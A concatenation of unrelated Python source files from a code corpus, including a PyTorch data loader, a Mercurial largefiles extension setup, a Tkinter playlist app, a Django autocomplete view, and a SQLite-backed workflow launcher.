def __init__(self, dataloader, if_shuffle=False, num_workers = 4):
"""
db is a list of tuples containing: imcrop_name, caption, bbox_feat of gt box, imname
"""
# self.opt =opt
self.dataloader = dataloader
self.if_shuffle = if_shuffle
self.num_workers = num_workers
# we need the first epoch to be shuffled, before it was in order to annotations
# even for val set
random.shuffle(self.dataloader.idxs)
# self.reset() # shuffle at beginning once
# Add more in the queue
def reset(self):
"""
Two cases for this function to be triggered:
1. not hasattr(self, 'split_loader'): Resume from previous training. Create the dataset given the saved split_ix and iterator
2. wrapped: a new epoch, the split_ix and iterator have been updated in the get_minibatch_inds already.
"""
# batch_size is 1, the merge is done in DataLoader class
self.split_loader = iter(data.DataLoader(dataset=self.dataloader,
batch_size=1,
sampler=SubsetSampler(self.dataloader.idxs[self.dataloader.iterator:]),
shuffle=False,
pin_memory=True,
num_workers= self.num_workers,#1, # 4 is usually enough
worker_init_fn=None,
collate_fn=lambda x: x[0]))
def _get_next_minibatch_inds(self):
max_index = len(self.dataloader.idxs)
wrapped = False
ri = self.dataloader.iterator
ix = self.dataloader.idxs[ri]
ri_next = ri + 1
if ri_next >= max_index:
ri_next = 0
if self.if_shuffle:
print('shuffling')
random.shuffle(self.dataloader.idxs)
wrapped = True
self.dataloader.iterator = ri_next
return ix, wrapped
def get(self):
if not hasattr(self, 'split_loader'):
self.reset()
ix, wrapped = self._get_next_minibatch_inds()
tmp = self.split_loader.next()
if wrapped:
self.reset()
try:
assert tmp[-1] == ix, "ix not equal"
except Exception as E:
print('ix {}, tmp[-1 {}'.format(ix, tmp[-1]))
print(E)
return tmp + [wrapped]
#%%
class SubsetSampler(torch.utils.data.sampler.Sampler):
"""Samples elements randomly from a given list of indices, without replacement.
Arguments:
indices (list): a list of indices
"""
def __init__(self, indices):
self.indices = indices
def __iter__(self):
# print('randperm')
return (self.indices[i] for i in range(len(self.indices)))
# return (self.indices[i] for i in torch.randperm(len(self.indices)))
def __len__(self):
return len(self.indices) | StarcoderdataPython |
6486671 | from .attn_talling_head import *
from .cls_block import *
| StarcoderdataPython |
11373183 | import numpy as np
def evaluate_model(dataset, interpreter):
input_index = interpreter.get_input_details()[0]["index"]
output_index = interpreter.get_output_details()[0]["index"]
predictions = []
labels = []
done = 0
for test_images, test_labels in dataset:
# Run predictions on every image in the "test" dataset.
for i, test_image in enumerate(test_images):
done += 1
if done % 1000 == 0:
print(done, end='; ')
# Pre-processing: add batch dimension and convert to float32 to match with
# the model's input data format.
test_image = np.expand_dims(test_image, axis=0).astype(np.float32)
interpreter.set_tensor(input_index, test_image)
# Run inference.
interpreter.invoke()
# Post-processing: remove batch dimension and find the digit with highest
# probability.
output = interpreter.tensor(output_index)
digit = np.argmax(output()[0])
predictions.append(digit)
labels.append(test_labels)
# Compare prediction results with ground truth labels to calculate accuracy.
prediction_digits = np.array(predictions)
accuracy = (prediction_digits == labels).mean()
return accuracy
| StarcoderdataPython |
11399611 | # Copyright 2009-2010 <NAME>
# Copyright 2009-2010 Intelerad Medical Systems Incorporated
# Copyright 2010-2011 Fog Creek Software
# Copyright 2010-2011 Unity Technologies
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
'''setup for largefiles extension: uisetup'''
from mercurial import archival, cmdutil, commands, extensions, filemerge, hg, \
httprepo, localrepo, merge, sshrepo, sshserver, wireproto
from mercurial.i18n import _
from mercurial.hgweb import hgweb_mod, protocol, webcommands
from mercurial.subrepo import hgsubrepo
import overrides
import proto
def uisetup(ui):
# Disable auto-status for some commands which assume that all
# files in the result are under Mercurial's control
entry = extensions.wrapcommand(commands.table, 'add',
overrides.overrideadd)
addopt = [('', 'large', None, _('add as largefile')),
('', 'normal', None, _('add as normal file')),
('', 'lfsize', '', _('add all files above this size '
'(in megabytes) as largefiles '
'(default: 10)'))]
entry[1].extend(addopt)
entry = extensions.wrapcommand(commands.table, 'addremove',
overrides.overrideaddremove)
entry = extensions.wrapcommand(commands.table, 'remove',
overrides.overrideremove)
entry = extensions.wrapcommand(commands.table, 'forget',
overrides.overrideforget)
# Subrepos call status function
entry = extensions.wrapcommand(commands.table, 'status',
overrides.overridestatus)
entry = extensions.wrapfunction(hgsubrepo, 'status',
overrides.overridestatusfn)
entry = extensions.wrapcommand(commands.table, 'log',
overrides.overridelog)
entry = extensions.wrapcommand(commands.table, 'rollback',
overrides.overriderollback)
entry = extensions.wrapcommand(commands.table, 'verify',
overrides.overrideverify)
verifyopt = [('', 'large', None, _('verify largefiles')),
('', 'lfa', None,
_('verify all revisions of largefiles not just current')),
('', 'lfc', None,
_('verify largefile contents not just existence'))]
entry[1].extend(verifyopt)
entry = extensions.wrapcommand(commands.table, 'outgoing',
overrides.overrideoutgoing)
outgoingopt = [('', 'large', None, _('display outgoing largefiles'))]
entry[1].extend(outgoingopt)
entry = extensions.wrapcommand(commands.table, 'summary',
overrides.overridesummary)
summaryopt = [('', 'large', None, _('display outgoing largefiles'))]
entry[1].extend(summaryopt)
entry = extensions.wrapcommand(commands.table, 'update',
overrides.overrideupdate)
entry = extensions.wrapcommand(commands.table, 'pull',
overrides.overridepull)
entry = extensions.wrapcommand(commands.table, 'cat',
overrides.overridecat)
entry = extensions.wrapfunction(merge, '_checkunknownfile',
overrides.overridecheckunknownfile)
entry = extensions.wrapfunction(merge, 'manifestmerge',
overrides.overridemanifestmerge)
entry = extensions.wrapfunction(filemerge, 'filemerge',
overrides.overridefilemerge)
entry = extensions.wrapfunction(cmdutil, 'copy',
overrides.overridecopy)
# Summary calls dirty on the subrepos
entry = extensions.wrapfunction(hgsubrepo, 'dirty',
overrides.overridedirty)
# Backout calls revert so we need to override both the command and the
# function
entry = extensions.wrapcommand(commands.table, 'revert',
overrides.overriderevert)
entry = extensions.wrapfunction(commands, 'revert',
overrides.overriderevert)
# clone uses hg._update instead of hg.update even though they are the
# same function... so wrap both of them)
extensions.wrapfunction(hg, 'update', overrides.hgupdate)
extensions.wrapfunction(hg, '_update', overrides.hgupdate)
extensions.wrapfunction(hg, 'clean', overrides.hgclean)
extensions.wrapfunction(hg, 'merge', overrides.hgmerge)
extensions.wrapfunction(archival, 'archive', overrides.overridearchive)
extensions.wrapfunction(cmdutil, 'bailifchanged',
overrides.overridebailifchanged)
# create the new wireproto commands ...
wireproto.commands['putlfile'] = (proto.putlfile, 'sha')
wireproto.commands['getlfile'] = (proto.getlfile, 'sha')
wireproto.commands['statlfile'] = (proto.statlfile, 'sha')
# ... and wrap some existing ones
wireproto.commands['capabilities'] = (proto.capabilities, '')
wireproto.commands['heads'] = (proto.heads, '')
wireproto.commands['lheads'] = (wireproto.heads, '')
# make putlfile behave the same as push and {get,stat}lfile behave
# the same as pull w.r.t. permissions checks
hgweb_mod.perms['putlfile'] = 'push'
hgweb_mod.perms['getlfile'] = 'pull'
hgweb_mod.perms['statlfile'] = 'pull'
extensions.wrapfunction(webcommands, 'decodepath', overrides.decodepath)
# the hello wireproto command uses wireproto.capabilities, so it won't see
# our largefiles capability unless we replace the actual function as well.
proto.capabilitiesorig = wireproto.capabilities
wireproto.capabilities = proto.capabilities
# these let us reject non-largefiles clients and make them display
# our error messages
protocol.webproto.refuseclient = proto.webprotorefuseclient
sshserver.sshserver.refuseclient = proto.sshprotorefuseclient
# can't do this in reposetup because it needs to have happened before
# wirerepo.__init__ is called
proto.ssholdcallstream = sshrepo.sshrepository._callstream
proto.httpoldcallstream = httprepo.httprepository._callstream
sshrepo.sshrepository._callstream = proto.sshrepocallstream
httprepo.httprepository._callstream = proto.httprepocallstream
# don't die on seeing a repo with the largefiles requirement
localrepo.localrepository.supported |= set(['largefiles'])
# override some extensions' stuff as well
for name, module in extensions.extensions():
if name == 'fetch':
extensions.wrapcommand(getattr(module, 'cmdtable'), 'fetch',
overrides.overridefetch)
if name == 'purge':
extensions.wrapcommand(getattr(module, 'cmdtable'), 'purge',
overrides.overridepurge)
if name == 'rebase':
extensions.wrapcommand(getattr(module, 'cmdtable'), 'rebase',
overrides.overriderebase)
if name == 'transplant':
extensions.wrapcommand(getattr(module, 'cmdtable'), 'transplant',
overrides.overridetransplant)
| StarcoderdataPython |
9774857 | import os
from tkinter import *
from tkinter import filedialog
from tkmacosx import Button, CircleButton
import tkinter.font as font
import datetime as dt
import SongDB as s_db
import PlaylistDB as p_db
import Tapes as tp
import Playlists as pl
import ProjTools as pt
import numpy as np
class CreatePlayList(Frame):
def __init__(self, root):
Frame.__init__(self, root)
self.current_playlist = []
self.current_playlist_name = ""
u_font = font.Font(family='Helvetica', size=16)
self.or_label = Label(root, text='Please enter in the song name or search path.',
font=font.Font(family='Helvetica', size=16), bg='#EBDEF0', fg='red', bd=10).place(
relx=0.515, rely=0.35, anchor=CENTER)
self.home_label = pt.create_Frame_label(root, 'PlayList Creator')
self.name_label = Label(root, text='Playlist Name: ', font=u_font, bg='#EBDEF0', bd=3)
self.name_label.place(x=20, y=50)
self.search_label = Label(root, text='Song Name: ', font=u_font, bg='#EBDEF0', bd=3)
self.search_label.place(x=20, y=130)
self.find_song_path_label = Label(root, text='Enter Path: ', font=u_font, bg='#EBDEF0', bd=3)
self.find_song_path_label.place(x=20, y=160)
self.name_entry = Entry(master=root, width=40, bg='pink', fg='black', borderwidth=3)
self.name_entry.place(x=150, y=50)
self.search_entry = Entry(master=root, width=40, bg='pink', fg='black', borderwidth=3)
self.search_entry.place(x=150, y=130)
self.find_song_path_entry = Entry(master=root, width=40, bg='pink', fg='black', borderwidth=3)
self.find_song_path_entry.place(x=150, y=160)
self.find_song_path_entry.insert(0, '/User/username/..../song_name')
self.add_button = Button(root, text='Add', font=u_font, bg='#A3E4D7', fg='#5F4B8B', borderless=1,
activebackground=('#AE0E36', '#D32E5E'), activeforeground='#E69A8D', padx=5,
command=self.__get_add)
self.add_button.place(relx=0.88, rely=0.80, anchor=SE)
self.submit_button = Button(root, text='Submit', font=u_font, bg='#A3E4D7', fg='#5F4B8B', borderless=1,
activebackground=('#AE0E36', '#D32E5E'), activeforeground='#E69A8D', padx=5,
command=self.__get_create)
self.submit_button.place(relx=0.88, rely=0.965, anchor=SE)
self.clear_button = CircleButton(root, text='CE', font=font.Font(family='Helvetica', size=12), bg='#A3E4D7',
fg='#5F4B8B', borderless=1,
activebackground=('#AE0E36', '#D32E5E'), activeforeground='#E69A8D', radius=20,
command=self.__get_clear)
self.clear_button.place(relx=0.98, rely=0.40, anchor=SE)
load_button = Button(root, text='Search Path', font=u_font, bg='#A3E4D7', fg='#5F4B8B', borderless=1,
activebackground=('#AE0E36', '#D32E5E'), activeforeground='#E69A8D', padx=5,
command=self.__get_load)
load_button.place(relx=0.016, rely=0.74)
# /Users/varunpoondi/Desktop/mp4-Music/Playboi Carti- 9 AM in Calabasas remix(prod by Adrian).mp4
def __get_load(self):
self.find_song_path_entry.delete(0, END)
self.music_file = filedialog.askopenfilename()
self.find_song_path_entry.insert(0, self.music_file)
def __get_add(self):
self.current_playlist_name = self.name_entry.get()
if self.search_entry.get() != '':
search_result = s_db.get_music_by_name(self.search_entry.get())
if search_result is None:
self.search_entry.delete(0, END)
self.search_entry.insert(0, 'Song Was not found in you library.')
else:
music_path = s_db.get_path_by_title(search_result)
print("Song was found in your library")
self.current_playlist.append(music_path)
self.search_entry.delete(0, END)
else:
flag = pt.file_checker(self.find_song_path_entry)
if not flag:
self.find_song_path_entry.delete(0, END)
self.find_song_path_entry.insert(0, 'Invalid File Path! Please try again.')
else:
path = self.find_song_path_entry.get()
arr = path.split('/')
song_title = arr[-1]
parse = song_title.split('-')
author = parse[0]
song = parse[-1]
song = str(song)[:-4]
author = pt.format_vars(author)
song = pt.format_vars(song)
tape = tp.Tape(path, author, song)
s_db.add_tape(tape)
self.current_playlist.append(tape.video_path)
print('song added')
s_db.get_lib_info()
def __get_create(self):
if p_db.get_playlist_by_title(self.current_playlist_name) is None:
my_array = np.array(self.current_playlist)
date = dt.date.today()
current_date = str(date.month) + "-" + str(date.day) + "-" + str(date.year)
playlist = pl.Playlist(my_array, self.current_playlist_name, current_date)
p_db.add_playlist(playlist)
print(playlist.__str__())
self.name_entry.delete(0, END)
else:
self.name_entry.delete(0, END)
self.name_entry.insert(0, 'Playlist title already exists! Please choose a unique name.')
self.search_entry.delete(0, END)
self.find_song_path_entry.delete(0, END)
def __get_clear(self):
self.find_song_path_entry.delete(0, END)
self.search_entry.delete(0, END)
| StarcoderdataPython |
53578 | from django.shortcuts import render
from django.views.generic import CreateView
from django.urls import reverse_lazy
from dal import autocomplete
# from .models import Country, Person
# from .forms import PersonForm
from .models import Country
from .forms import CountryForm
# Create your views here.
# class PersonCreateView(CreateView):
# model = Person
# form_class = PersonForm
# template_name = 'person_form.html'
# view_name = 'create-person'
# success_url = reverse_lazy(view_name)
# Create your views here.
class CountryCreateView(CreateView):
model = Country
form_class = CountryForm
template_name = 'person_form.html'
view_name = 'create-country'
success_url = reverse_lazy(view_name)
class CountryAutocompleteView(autocomplete.Select2QuerySetView):
def get_queryset(self):
# model = Country
# paginate_by = 50
# ordering = ['name']
# if self.request.user.is_authenticated:
# return Country.objects.none()
qs = Country.objects.all()
# country = self.forwarded.get('country', None)
if self.q:
qs = qs.filter(name__icontains=self.q)
# qs = qs.filter(name__icontains=self.q)
return qs
def get_create_option(self, context, q):
"""Form the correct create_option to append to results."""
create_option = []
display_create_option = False
if self.create_field and q:
page_obj = context.get('page_obj', None)
if page_obj is None or page_obj.number == 1:
display_create_option = True
# Don't offer to create a new option if a
# case-insensitive) identical one already exists
existing_options = (self.get_result_label(result).lower()
for result in context['object_list'])
if q.lower() in existing_options:
display_create_option = False
print("RANNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN")
if display_create_option and self.has_add_permission(self.request):
create_option = [{
'id': q,
'text': ('"%(new_value)s"') % {'new_value': q},
'create_id': True,
}]
print("create_optionNNNNNNNN :", create_option)
return create_option
def has_add_permission(self, request):
print("ORRRRRRRRRRRRRRRRRRRRRRRR")
return True | StarcoderdataPython |
1721856 | <filename>github_loading.py
import logging
from requests.models import Response
from EntityLoader import LoadBehaviour
def get_url_params(params: dict) -> str:
_params = '&'.join(['{}={}'.format(k, v) for k, v in params.items()])
return '?{}'.format(_params) if len(_params) > 0 else ''
class GithubLoadBehaviour(LoadBehaviour):
def __init__(self,
_token: str,
per_page: int,
_logger: logging.Logger):
super().__init__()
self._per_page = per_page
self._token = _token
self._logger = _logger
def _get_url_params(self, params: dict) -> str:
_params = '&'.join(['{}={}'.format(k, v) for k, v in params.items()])
return '?{}'.format(_params) if len(_params) > 0 else ''
def _get_remaining_limit(self, resp: Response) -> int:
limit = resp.headers.get('X-RateLimit-Remaining')
if limit:
return int(limit)
return 0
def _get_params(self, page) -> dict:
return {
'per_page': self._per_page,
'page': page,
'state': 'all'
}
def _get_headers(self) -> dict:
return {
'Authorization': 'token {}'.format(self._token)
}
def _get_next_page(self, cur_page: int, resp: Response) -> int:
if resp.status_code < 400:
return cur_page + 1
if resp.status_code == 403:
return cur_page
return cur_page
def _is_last_page(self, return_object_count: int, resp: Response) -> bool:
resp_status = int(resp.status_code)
if (return_object_count < self._per_page) and resp_status < 400:
return True
if resp_status == 404:
return True
return False
| StarcoderdataPython |
3203734 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = "<NAME>"
import gym
import numpy
from gym.spaces.box import Box
__all__ = ["NoisyWrapper"]
class NoisyWrapper(gym.ObservationWrapper):
"""Make observation dynamic by adding noise"""
def __init__(self, env=None, percent_pad=5, bottom_margin=20):
"""
# doom 20px bottom is useless
:param env:
:param percent_pad:
:param bottom_margin:"""
super().__init__(env)
self.original_shape = env.space.shape
new_side = int(round(max(self.original_shape[:-1]) * 100.0 / (100.0 - percent_pad)))
self.new_shape = [new_side, new_side, 3]
self.observation_space = Box(0.0, 255.0, self.new_shape)
self.bottom_margin = bottom_margin
self.ob = None
def _observation(self, obs) -> numpy.ndarray:
im_noise = numpy.random.randint(0, 256, self.new_shape).astype(obs.dtype)
im_noise[: self.original_shape[0] - self.bottom_margin, : self.original_shape[1], :] = obs[
: -self.bottom_margin, :, :
]
self.ob = im_noise
return im_noise
# def render(self, mode='human', close=False):
# temp = self.env.render(mode, close)
# return self.ob
| StarcoderdataPython |
1822258 | <gh_stars>1-10
import random
import string
lowercase = "a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"
uppercase = "A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"
def firstName():
names=('Alexia','Alacia', 'Jordan','John','Andy','Joe','Caroline','Jennifer','Olivia','Anthony','Karen','Linda',
'Michael','Emanuel','Tiffany','Ashley','Asha','Tony','James','Steffany','Bryan','Ryan', 'Chelsea','Mariah'
,'Mariah','Jerrica','Erica','Jerry','Nicole','Arianna','Aria','Rick','Samantha','Samuel','Joseph','Josalyn'
,'Darell','Daryl','Matthew','Marcus','Randell','Tyler','Terry','India','Jacob','Benjamin','Ben','Martha',
'Jayden','Madison','Julian','Hunter','Cameron','Adrian','Evan','Micah','Jasmine','Cierra','Trent','Treya',
'Xavier','Renee','Paris','Julia','Tory','Lilly','Hannah','Ana','Annah','Martina','Martin','Glenroy',
'Larry','Jordynn','Toni','Bria','Briana','Bre','Sam','Darylynn','Daria','Jane','Jade','Jae','Ava','Julia',
'Julie','Eva','Angelina','Adam','Amanda','Ali','Alyssa','Aadi','Katelyn','Peyton','Zahara','Raquel','Chloe',
'Claire','Charlotte','Carlos','Caleb','Charles','Casey','Charlie','Cabal','Cabe','Cabernet','Daisy',
'Darren','Diego','Dawn','Daniella','Dick','Damian','Demetria','Ellie','Ethan','Edward','Ezra','Elias',
'Jaedynn','Camerynn','Abraham','Sean','Eric','Stanley','Markell','Juwann','Mohamad','Curt','Kristian',
'Lilly','Kayla','Tiffany','Tisha','Tish','Rebecca','Katie','Denisse','Denise','Valerie','Trisha','Melissa',
'Kim','Kimberly','Sabrina','Tristan','Keenan','Kell','Kristi','Kristan','Kristyn','Kate','Katelyn','Katie',
'Cheryl','Hart','Valerie','Valorie','Nikki','Cierra','Charlie','Queen','Allen','Kim','Cheryl','Cherlyn',
'Camal','Kent','Jana','Janet','Janette','Jeanette','Vitaly','Bishop','Sherri','Lori','Gloria','Angela'
,'Angie','Angel','Esmeralda','Cindy','Jamie','Steph','Stephanie','Shannon','Ken','Kenn','Aevin','Phukwane'
'Gonzalez',"Curtis","Leonel","Leo","Leonardo","Ronaldo","Benjamin","Kelsi","Sam","Samantha","Felisha",
"Kaylin","Jalen","Jaylin","Bradly","Brad","Bradford")
firstName = random.choice(names)
return firstName
def lastName():
names=('Johnson','Smith','Williams','Thompson','Friday','Lynch','Baker','Stout','Scott','Tuesday','Perez','Lopez'
,'Bryant','Love','Khalid','McKnight','McCurdy','McDonald','Donaldson','Jeffries','Henderson','Wilson',
'Williams','Brown','Kelly','Turner','Hiotte','Taylor','Mitchell','Burns','Wilson','Avery','Madison','Ryan',
'Riley','Adison','Parker','Taylor','Stevans','Cape','Lampoe','Austin','Knowles','Curry','Jackson','Hardaway'
,'Carson','Reagon','Kai','Kade','Jade','Morgon','Jude','Reese','Dakota','Paxton','Zane','Cane','Janne',
'Dallas','Skyler','Addison','Cole','Snead','Cook','Purdy','Reid','Ellis','Lane','Laww','Wilkerson',
'Justice','Notty','Brown','Davis','Miller','Schwartz','McDylan','Morrison','Klein','Mendoza','Sherman',
'Lawson','Barry','Costa','Nash','Forbes','Jacobs','Duncan','Levine','Hodge','Barry','Wall', 'Figuero',
'Mendoza','Hancock','Mata','Werner','Stokes','Mccormick','Winters','Mckee','Werner','Costa','Chang',
'Molina','Huff','Henson','Crane','Wu','Cowan','Hubbard','Rodgers','Berg','Le','Mclean','Porter','Yang',
'Waller','Limon','Stoute','Stringer','White','Brown','Pepper','Melton','Benson','Camble','Campbell','Bell',
'Camps','Brenneman','Ramirez','Valdez','Naughtty','Perry','Hill','Carter','Brady','Simpson','Winston',
'Bishops','Wright','Andriano','Lorell','Ming','Mindingall','Walker','Rousey','Witiker','Bates','Sail',
'Salles','Small','Smalls','Tate','Tait','Belton','Melton','Nowitski','WerrParker','Miller','Hansen','White',
'Moore','Nelson','Reade','Read','Reid','Macton','Mixon','Maxton','Mosley','Alpers')
lastName = random.choice(names)
return lastName
def address():
lowercase = "a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"
uppercase = "A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"
return
def password():
chars = string.ascii_uppercase + string.ascii_lowercase + string.digits
size = random.randint(12, 16)
password = (''.join(random.choice(chars) for x in range(size)))
return password
| StarcoderdataPython |
1801424 | <reponame>a-shah8/LeetCode
class Solution:
def maxDepth(self, s: str) -> int:
max_depth = 0
count = 0
for c in s:
if c=='(':
count += 1
max_depth = max(max_depth, count)
elif c==')':
count -= 1
return max_depth
| StarcoderdataPython |
95456 | # From Dalgaard page 83 [R755c9bae090e-1]_, suppose the daily energy intake for 11
# women in kilojoules (kJ) is:
intake = np.array([5260., 5470, 5640, 6180, 6390, 6515, 6805, 7515, \
7515, 8230, 8770])
# Does their energy intake deviate systematically from the recommended
# value of 7725 kJ? Our null hypothesis will be the absence of deviation,
# and the alternate hypothesis will be the presence of an effect that could be
# either positive or negative, hence making our test 2-tailed.
# Because we are estimating the mean and we have N=11 values in our sample,
# we have N-1=10 degrees of freedom. We set our significance level to 95% and
# compute the t statistic using the empirical mean and empirical standard
# deviation of our intake. We use a ddof of 1 to base the computation of our
# empirical standard deviation on an unbiased estimate of the variance (note:
# the final estimate is not unbiased due to the concave nature of the square
# root).
np.mean(intake)
# 6753.636363636364
intake.std(ddof=1)
# 1142.1232221373727
t = (np.mean(intake)-7725)/(intake.std(ddof=1)/np.sqrt(len(intake)))
t
# -2.8207540608310198
# We draw 1000000 samples from Student's t distribution with the adequate
# degrees of freedom.
import matplotlib.pyplot as plt
s = np.random.standard_t(10, size=1000000)
h = plt.hist(s, bins=100, density=True)
# Does our t statistic land in one of the two critical regions found at
# both tails of the distribution?
np.sum(np.abs(t) < np.abs(s)) / float(len(s))
# 0.018318 #random < 0.05, statistic is in critical region
# The probability value for this 2-tailed test is about 1.83%, which is
# lower than the 5% pre-determined significance threshold.
# Therefore, the probability of observing values as extreme as our intake
# conditionally on the null hypothesis being true is too low, and we reject
# the null hypothesis of no deviation.
| StarcoderdataPython |
3595381 | <reponame>jorasdf24/workflow-manager<filename>Workflow-manager.py<gh_stars>1-10
import os
import sys
import time
import sqlite3
import urllib.request as req
import urllib.parse as p
def is_valid_url(url):
"""Return True if the URL is valid, and false if not"""
try:
request = req.Request(url)
try:
response = req.urlopen(request)
response = True
except:
response = False
except:
response = False
return response
def is_valid_path(path):
"""Return True if the path is valid and False if not"""
return os.path.exists(path)
def get_paths_based_workflow(cursor,workflow_name):
"""Take the cursor and the workflow name, and return a list of paths that are found in this workflow"""
path_list = []
for name in cursor.execute("SELECT path FROM workflows WHERE workflow_name=?;",(workflow_name,)):
path_list.append(name[0])
return path_list
def get_workflow_list(cursor):
"""Return a list that contains all the name of the workflows exists in the DB"""
workflow_list = []
for name in cursor.execute("SELECT workflow_name FROM workflows;"):
#Clean the name
name = str(name).replace("(","")
name = str(name).replace(")","")
name = str(name).replace(",","")
name = str(name).replace("'","")
workflow_list.append(name)
return workflow_list
def open_paths_from_workflow(cursor,workflow_name):
"""Launch all paths from the workflow called workflow_name"""
# iterate through each path
for path in cursor.execute("SELECT path FROM workflows WHERE workflow_name = " + "'" + workflow_name + "';"):
try:
# Start the path
os.startfile(path[0])
time.sleep(0.1)
except Exception:
print ("Error opening file: " + str(path[0]))
# There is at least one path
is_workflow_exist = True
if not is_workflow_exist:
print ("This workflow does not exist...")
else:
print ("Enjoy")
def print_menu():
"""Print the Main Menu"""
print ("\n1 - Start workflow")
print ("2 - Create new workflow")
print ("3 - Edit workflow")
print ("4 - Delete workflow")
print ("5 - Print workflows")
print ("6 - Exit")
def print_menu2():
"""Print the Sub Menu to the third option of the Main Menu"""
print ("\n\t1 - Change workflow name")
print ("\t2 - Add path")
print ("\t3 - Delete Path")
print ("\t4 - Exit edit")
def workflow_exists(data_base, workflow_name):
"""Check if a certain workflow exists in the DB"""
result = False
# Need at least one iteration
for path in data_base.execute("SELECT path FROM workflows WHERE workflow_name = ?;", (workflow_name,)):
result = True
return result
def path_exists(data_base, workflow_name, path):
"""Return True if a certain path exist in the DB in a specific workflow, and False if not"""
result = False
# Need at least one iteration
for workflow_name, path in data_base.execute("SELECT workflow_name, path FROM workflows WHERE workflow_name = " + "'" + workflow_name + "'" + " and path = " + "'" + path + "';"):
result = True
return result
def main():
# Connect to the DB, create new one if doesn't exist
connection = sqlite3.connect('workflows.db')
# The cursor used for execute SQL command through the code
data_base = connection.cursor()
# Declare the architecture if the DB is just created
try:
data_base.execute("CREATE TABLE workflows(workflow_name text, path text);")
except Exception:
pass
run = True
while run:
workflow_list_name = get_workflow_list(data_base)
print_menu()
menu_choose = str(input("Enter your choice: "))
if menu_choose in workflow_list_name:
open_paths_from_workflow(data_base,menu_choose)
run = False
# Start workflow
if menu_choose is "1":
workflow_name = str(input("Which workflow do you want to start? "))
is_workflow_exist = False
# iterate through each path
for path in data_base.execute("SELECT path FROM workflows WHERE workflow_name = " + "'" + workflow_name + "';"):
try:
# Start the path
os.startfile(path[0])
time.sleep(0.1)
except Exception:
print ("Error opening file: " + str(path[0]))
# There is at least one path
is_workflow_exist = True
if not is_workflow_exist:
print ("This workflow does not exist...")
else:
print ("Enjoy")
run = False
# New workflow
elif menu_choose is "2":
valid_path = []
workflow_name = str(input("Enter a name for this workflow: "))
# Check if the requested new workflow name is not in use
if workflow_exists(data_base, workflow_name):
print ("There's already a workflow with this name!")
# Make sure the name is not empty
elif workflow_name == '':
print ("Empty name?")
else:
print ("Enter the paths of your desired things to be open. Enter -1 to close and save this workflow")
print ('')
path = ""
counter = 1
while path != "-1":
path = str(input("Enter path number " + str(counter) + ": "))
# Check valid path\URL and that they not exist in the DB
if (is_valid_path(path) or is_valid_url(path)) is False or path_exists(data_base, workflow_name, path):
if path != "-1":
print ("Path either already exists or is invalid!")
valid_path.append(False)
else:
values = (workflow_name, path)
# Insert the values for the new workflow
data_base.execute("INSERT INTO workflows VALUES (?,?);", values)
print ("Path saved")
valid_path.append(True)
counter += 1
# Save changes
connection.commit()
if True in valid_path:
print (workflow_name + " workflow saved successfully!")
else:
print ("Workflow wasn't saved")
# Edit workflow
elif menu_choose is "3":
run2 = True
workflow_name = str(input("Which workflow do you want to edit? "))
if workflow_exists(data_base, workflow_name):
while run2:
print_menu2()
edit_choose = str(input("\tEnter your choice: "))
# Change workflow name
if edit_choose is "1":
new_workflow_name = str(input("\tEnter new workflow name: "))
data_base.execute("UPDATE workflows SET workflow_name = " + "'" + new_workflow_name + "'" + " WHERE workflow_name = " + "'" + workflow_name + "';")
# Save changes
connection.commit()
workflow_name = new_workflow_name
print ("\tName changed!")
# Add path to the workflow
elif edit_choose is "2":
path = str(input("\tEnter the path of your desired thing to be open: "))
if (is_valid_path(path) or is_valid_url(path)) is True and not path_exists(data_base, workflow_name, path):
values = (workflow_name, path)
data_base.execute("INSERT INTO workflows VALUES (?,?);", values)
connection.commit()
print ("\tPath added!")
else:
print ("\tPath either already exists or is invalid!")
# Delete path in the workflow
elif edit_choose is "3":
print("\tEnter path to delete: ")
# Get the lost of paths in the workflows
path_list = get_paths_based_workflow(data_base,workflow_name)
path_number_dict = {}
# Make number based choosing system
for i in range(len(path_list)):
print("\t" + str(i + 1) + " - " + str(path_list[i]))
path_number_dict[str(i + 1)] = path_list[i]
number_input = str(input("\t"))
try:
path = path_number_dict[number_input]
except:
path = ""
if path_exists(data_base, workflow_name, path):
# Delete...
data_base.execute("DELETE FROM workflows WHERE workflow_name = " + "'" + workflow_name + "'" + " and path = " + "'" + path + "';")
connection.commit()
print ("\tPath/URL deleted!")
else:
print ("\tPath doesn't exist!")
# Exit to Main Menu
elif edit_choose is "4":
print ("\tChanges saved!")
run2 = False
else:
print ("This workflow does not exist...")
elif menu_choose is "4":
print ("Which workflow do you want to delete?")
workflow_name = str(input())
# Check if the workflow exists
if workflow_exists(data_base, workflow_name):
data_base.execute("DELETE FROM workflows WHERE workflow_name = ?;", (workflow_name,))
# Save changes to prevent loss
connection.commit()
print ("Workflow deleted successfully!")
else:
print ("This workflow does not exist...")
# Print workflows
elif menu_choose is "5":
workflows_dict = {}
# Save the data to a dict
for name in data_base.execute("SELECT workflow_name, path FROM workflows;"):
workflows_dict[name[0]] = []
for name in data_base.execute("SELECT workflow_name, path FROM workflows;"):
workflows_dict[name[0]].append(name[1])
if bool(workflows_dict):
print ("We found these workflows:")
print ('')
else:
print ("No workflows were created!")
# Print the data
for key, value in workflows_dict.items():
print ("Name: " + key)
for i in range(len(value)):
if i == 0:
print ("Paths: " + value[i])
else:
print (" " + value[i])
print ('')
# Exit the program
elif menu_choose is "6":
print ("See you later!")
run = False
# Save (commit) the changes
connection.commit()
# Close the connection with the DB
connection.close()
if __name__ == "__main__":
main() | StarcoderdataPython |
1771175 | <filename>tests/util/py/decorators_test.py
# Copyright 2014-2020 <NAME> <<EMAIL>>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for //labm8/py:decorators.py."""
import time
